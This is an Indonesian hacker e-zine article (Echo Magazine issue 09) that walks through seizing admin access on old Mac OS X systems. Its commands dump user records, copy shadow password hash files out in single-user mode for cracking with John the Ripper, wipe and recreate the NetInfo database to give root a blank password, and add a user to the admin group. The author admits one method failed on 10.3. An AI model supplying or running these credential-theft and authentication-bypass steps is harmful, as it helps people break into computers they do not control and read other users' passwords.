Echo Magazine Issue 09 Phile 0x003

Published in

· 4 years ago

  

     
   
        ____________________   ___ ___ ________    
       --\_   _____/\_   ___ \ /   |   \\_____  \-- 
	 -|    __)_ /    \  \//    ~    \/   |   \-- 
	 -|        \\     \___\    Y    /    |    \-- 
	-/_______  / \______  /\___|_  /\_______  /- 
	 -      -\/        -\/      -\/        -\/-  

 
					    .OR.ID 
ECHO-ZINE RELEASE 09 

Author: AgD || saddam.husein@gmail.com || AgD@telkom.net 
Online @ www.echo.or.id :: http://ezine.echo.or.id 

.:: Crack Admin Password (Mac OS x) ::.  

Untuk meng-crackpassword langkah pertama adalah mendapatkan hash. Run terminal and type: 

G4x:~ noadmin$ nidump passwd .  
	-- anda akan melihat admin username diikuti tanda : ********   
	   ex: root:********:0:0::0:0:System Administrator:/var/root:/bin/sh 
	       admin:********:503:503::0:0:agd:/Users/admin:/bin/bash 
	       agd:********:503:503::0:0:agd:/Users/agd:/bin/bash 

G4x:~ noadmin$ niutil -read . /users/admin --> untuk membaca profil dari admin dan akan 			 
-- dihasilkan generateduid : F8EE9D97-4E66-11D9-AFFE-000A95C81955 --> make note about this	    

misalkan untuk melihat profil dari user agd: 
-------------------------------------------------- 
G4x:~ noadmin$ niutil -read . /users/agd 
name: agd 
_writers_passwd: agd 
_writers_tim_password: agd 
_writers_picture: agd 
shell: /bin/bash 
_writers_hint: agd 
home: /Users/agd 
gid: 503 
authentication_authority: ;ShadowHash; 
_writers_realname: agd 
picture: /Library/User Pictures/Animals/Dog.tif 
passwd: ******** 
realname: agd 
hint:  
sharedDir: Public 
_shadow_passwd:  
uid: 503 
generateduid: F8EE9D97-4E66-11D9-AFFE-000A95C81944 
---------------------------------------------------	 

kemudian untuk meng-generate kedalam file text lakukan perintah berikut: 

-------------------------------------------------- 
G4x:~ noadmin$ nireport / /users agd generateduid > crck.txt 

reboot, masuk melalui single-user mode (hold Cmd+S). dan ketikan perintah ini: 

mount -uaw 
cp -R /var/db/shadow/hash /Users/hash 
chmod -Rf 777 /Users/hash 
reboot 

perintah diatas untuk memindahkan file hash ke directory /Users/hash. 
Setelah mendapatkan hash, download john the ripper di http://www.openwall.com/john/ 

Cara untuk menggunakan JTR tidak akan dibahas disini karena sudah banyak sekali  
tutorial-tutorial yang bertebaran di inet tentang JTR ini. 

----------------------------------------------------------------------------------------------------- 
Jika anda tetap tidak mendapatkan akses untuk melakukan perintah2 diatas, maka anda dapat sama sekali  
menghapus file database netinfo dan menggantinya dengan yang baru sehingga yang dapat masuk kedalam  
komputer hanya user yg anda ciptakan. 
----------------------------------------------------------------------------------------------------- 

hanya dengan melakukan perintah ini: 
----------------------------------------------------------------------------------------------------- 
reboot ke single user mode, secara default anda akan mempunyai akses root. 

localhost:/ root# /sbin/mount -uw / 
localhost:/ root# cd /var/db/netinfo 
localhost:/var/db/netinfo root# mv local.nidb local.nidb.old  --->tujuannya untuk menonaktifkan netinfo 								  sebelumnya, dan mengganti dg yg baru 
localhost:/var/db/netinfo root# /usr/libexec/create_nidb      --->netinfo baru! 
localhost:/var/db/netinfo root# nicl -raw local.nidb -create /users/root passwd "" -->enable root  
sehingga anda bisa mengakses komputer dalam mode gui dengan account root (password blank) dan membuat  
account baru (admin) sesuka anda 

localhost:/var/db/netinfo root# exit 

----------------------------------------------------------------------------------------------------- 

atau jika anda tidak ingin mereset keseluruhan database netinfo gunakan perintah ini pada single-user: 
----------------------------------------------------------------------------------------------------- 
localhost:/ root# /sbin/fsck -y 
localhost:/ root# /sbin/mount -wu 
localhost:/ root# /sbin/SystemStarter 
localhost:/ root# niuitil -appendprop / /groups/admin users USER 
localhost:/ root# sudo reboot 
----------------------------------------------------------------------------------------------------- 

Maaf ternyata cara diatas tidak berhasil, karena saya menggunakan tehnik ini pada OS 10.2 (it's work!)  
dan mungkin tidak berhasil pada OS 10.3 

Dan jika terdapat kesalahan mohon dikoreksi untuk menghasilkan tulisan yang jauh lebih baik :P 

 
	REFERENSI : http://freaky.staticusers.net 
	            http://www.openwall.com/john/  

 
*GREETZ TO:  	Apple G4, Mr. Steve Jobs, [M4'is]--> kamana wae mank??, [Bono the CaT] 
		[Ono], Echo|Staff (yg mau memuat tulisan ini, thank's bro!) Echo|Memberz, Barudak 	 
		newbie_hacker dan semua portal Hacking dan open source di indonesia 

	 
	kirimkan kritik && saran ke saddam.husein@gmail.com || AgD@telkom.net

Echo Magazine Issue 09 Phile 0x003

Share this article

Let's discover also

Echo Magazine Issue 23 Phile 0x003

Echo Magazine Issue 21 Phile 0x003

Echo Magazine Issue 18 Phile 0x003

Echo Magazine Issue 31 Phile 0x003

Echo Magazine Issue 29 Phile 0x003

Echo Magazine Issue 15 Phile 0x003

Echo Magazine Issue 22 Phile 0x003

Echo Magazine Issue 25 Phile 0x003

Echo Magazine Issue 28 Phile 0x003

Echo Magazine Issue 30 Phile 0x003

Recent Articles

My British citizenship

Crema catalana ketogenica

Leeto Phreako Headz Issue 4

Leeto Phreako Headz Issue 3

Leeto Phreako Headz Issue 2 (Part II of II)

Sea Serpents and Lake Monsters: Legends or Reality ?

The Palenque Stela, evidence of ancient astronauts?

Leeto Phreako Headz Issue 2 (Part I of II)

Interview d'Alain Finkielkraut

Entre Mel Gibson et Edgar Morin

Recent Comments